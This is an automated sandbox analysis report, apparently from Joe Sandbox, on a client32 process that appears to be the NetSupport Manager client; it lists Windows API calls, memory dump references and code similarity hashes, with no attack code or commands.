                                                                                                                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 863766397-389219706
                                                                                                                                                                                                    • Opcode ID: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction ID: a1209e8bcef48249843ed2990b636ee265ac836deafb44f4c9fe9e5cc28cb7ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18215E75A0061DABDB00DF95DC81FEEF3B8EF48714F104259E925B3280EB746904CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5D7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5E4
                                                                                                                                                                                                    • __realloc_crt.LIBCMT ref: 1115F621
                                                                                                                                                                                                    • __realloc_crt.LIBCMT ref: 1115F637
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F649
                                                                                                                                                                                                    • EncodePointer.KERNEL32(11019A91,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F65D
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F665
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4108716018-0
                                                                                                                                                                                                    • Opcode ID: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
                                                                                                                                                                                                    • Instruction ID: 865a5de33b780d49622554ffb0a8386059ac67280241af18dea6a2ab0d8d04ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11E976601227AFD7419FB5CCC085AFBE9EB41268715043BE826D3160FB71ED10CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 68826986
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,00000010,68826D69,00000000,?), ref: 688269A4
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 688269D7
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 688269EF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 688269FD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 68826A17
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 68826A25
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
• API ID: ErrorLast$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionH_prolog3HeadInitializeListThrow
• String ID:
• API String ID: 3312236879-0
• Opcode ID: e37c73066b0ab8e518d46482837f42225effc3d0a08fe30cdec701a3a29e5502
• Instruction ID: f31d87db972289a8bd310a69eddeb588bc15d0a716b48184ba013887ef971b03
• Opcode Fuzzy Hash: e37c73066b0ab8e518d46482837f42225effc3d0a08fe30cdec701a3a29e5502
• Instruction Fuzzy Hash: 4E219D75540606DFDB51DF68C9647AFB7F4BF0A304B908829E55AD7200EB30EA81CBA1
APIs
• __EH_prolog3.LIBCMT ref: 68818AD3
  • Part of subcall function 688162E7: __EH_prolog3.LIBCMT ref: 688162EE
  • Part of subcall function 688162E7: ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,68818AE8,?,000000FF), ref: 68816365
  • Part of subcall function 688162E7: _memset.LIBCMT(00000000,00000000,?,00000000,68818AE8,?,000000FF), ref: 68816377
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00000001,00000010,68820C24,00000000,00000000,00000000,?,?,00000000,6887FF1C), ref: 68818B03
• GetLastError.KERNEL32(?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B13
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B2B
• _CxxThrowException.MSVCR100(?,68880C48,00000000,?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B39
• ??2@YAPAXI@Z.MSVCR100(0000001C,00000000,?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B4B
• GetCurrentThreadId.KERNEL32 ref: 68818B80
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: H_prolog3$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
• String ID:
• API String ID: 1790702778-0
• Opcode ID: 8b21dda331f95becd7b52e705f391635d2186951b87c33940618e4d829769485
• Instruction ID: 167e22655ff0219513fe8d0d44cac03e5127d81dd88becb7b878f69b1dc387e6
• Opcode Fuzzy Hash: 8b21dda331f95becd7b52e705f391635d2186951b87c33940618e4d829769485
• Instruction Fuzzy Hash: 742193F494424BAFD7009F758888AAEBFA4FF09314BD08979E5A9D7200CB34D955DFA0
APIs
• InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
• EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
• EnterCriticalSection.KERNEL32(?), ref: 1100B2F8
  • Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
  • Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
  • Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
  • Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
  • Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B
• waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
• LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
• _free.LIBCMT ref: 1100B318
• _free.LIBCMT ref: 1100B31E
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
• String ID:
• API String ID: 705253285-0
• Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
• Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
• Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
• Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61
APIs
• GetDlgItem.USER32(?,00000475), ref: 110CB5E0
• GetWindowTextLengthA.USER32(00000000), ref: 110CB5E7
• GetDlgItemTextA.USER32(?,00000475,00000000,00000001), ref: 110CB605
• _free.LIBCMT ref: 110CB617
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
• IsA(), xrefs: 110CB635
• e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110CB630
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorItemLastText$ExitFreeHeapLengthMessageProcessWindow_freewsprintf
• String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 251526942-3415836059
• Opcode ID: 99e580d3e1833fc068e3b290c8354ea38fc1aa46638c1302fc5de43aa3fb4a75
• Instruction ID: 0eb6a058222da800fe12992da5caab4c5bd0fe2efc99a90d0edb73e055c5ac9e
• Opcode Fuzzy Hash: 99e580d3e1833fc068e3b290c8354ea38fc1aa46638c1302fc5de43aa3fb4a75
• Instruction Fuzzy Hash: CA01AD7AA00517BBD740DB99DC88D9FF3ADEF892583148120FA2887200DB34F9158BE2
APIs
• _errno.MSVCR100 ref: 6883A993
• _invalid_parameter_noinfo.MSVCR100 ref: 6883A99E
  • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
• __wsopen_s.LIBCMT(00000000,00000000,00008002,00000040,00000000), ref: 6883A9B8
• __futime64.LIBCMT(00000000,?), ref: 6883A9CC
• _errno.MSVCR100 ref: 6883A9DA
• _close.MSVCR100(00000000), ref: 6883A9E9
• _errno.MSVCR100 ref: 6883A9F4
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__futime64__wsopen_s_close_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 503974632-0
                                                                                                                                                                                                    • Opcode ID: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                                                                                                                    • Instruction ID: bf0f45bdb1e742a7bb3dcf1ca2b86ae2cf3b8eab06f843807cabc1a490d03590
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E01A236504528EBDF001FA9DC49B993B659F80778F928612FA387B1D0DB31995187E1
APIs
• _memset.LIBCMT ref: 1101D35E
• LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
• LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
• RegisterClassExA.USER32(00000030), ref: 1101D3E1
• GetLastError.KERNEL32 ref: 1101D3E7
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Load$ClassCursorErrorIconLastRegister_memset
• String ID: 0
• API String ID: 430917334-4108050209
• Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
• Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
• Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
• Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96
APIs
• GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818BF0
• GetCurrentThread.KERNEL32 ref: 68818BF3
• GetCurrentProcess.KERNEL32(00000000,?,68820AE8,?,?,?,00000000), ref: 68818BFA
• DuplicateHandle.KERNEL32(00000000,?,68820AE8,?,?,?,00000000), ref: 68818BFD
• GetLastError.KERNEL32(?,68820AE8,?,?,?,00000000), ref: 68818C07
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,68820AE8,?,?,?,00000000), ref: 68818C1F
• _CxxThrowException.MSVCR100(68880C48,68880C48,00000000,?,68820AE8,?,?,?,00000000), ref: 68818C2D
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
• String ID:
• API String ID: 2881127307-0
• Opcode ID: ee76d90a30474edde0f8b451ae53152faae136c9eb5c10c7fc1d30a0d93dc560
• Instruction ID: 1326c2708b90d019255591ef35377a754f8389a5028402e9220dc937b1b9037e
• Opcode Fuzzy Hash: ee76d90a30474edde0f8b451ae53152faae136c9eb5c10c7fc1d30a0d93dc560
• Instruction Fuzzy Hash: 45F09072980216A7CB10ABB58C0EFEF7B6CBF06740F804925B151D3080DF34E401CBA0
APIs
• __doserrno.MSVCR100 ref: 6882E951
• _errno.MSVCR100 ref: 6882E959
• _invalid_parameter_noinfo.MSVCR100 ref: 6882E964
  • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
• GetFileAttributesA.KERNEL32(00000000), ref: 6882E971
• GetLastError.KERNEL32 ref: 6882E97C
• __dosmaperr.LIBCMT(00000000), ref: 6882E983
• SetFileAttributesA.KERNEL32(00000000,00000000), ref: 6882E99D
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: AttributesFile$ErrorLast__doserrno__dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
• String ID:
• API String ID: 567378056-0
• Opcode ID: e9b1b398537aab9109600170e59bece55f63aaa0f85d32b52625b41e7cfb4c71
• Instruction ID: c283b0f597a8b5eadf1e1b926b36e538d037b7e392f49f39d97634bb7c2ece19
• Opcode Fuzzy Hash: e9b1b398537aab9109600170e59bece55f63aaa0f85d32b52625b41e7cfb4c71
• Instruction Fuzzy Hash: CDF03071414648EFDB506BF4D91C36D7B64BF02376F944A16F438954E1CB30C88097B5
APIs
• LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
• GetSubMenu.USER32(00000000,00000000), ref: 11003373
• DestroyMenu.USER32(00000000), ref: 110033A2
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA
APIs
• LoadMenuA.USER32(00000000,00002EF1), ref: 1100343D
• GetSubMenu.USER32(00000000,00000000), ref: 11003463
• DestroyMenu.USER32(00000000), ref: 11003492
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
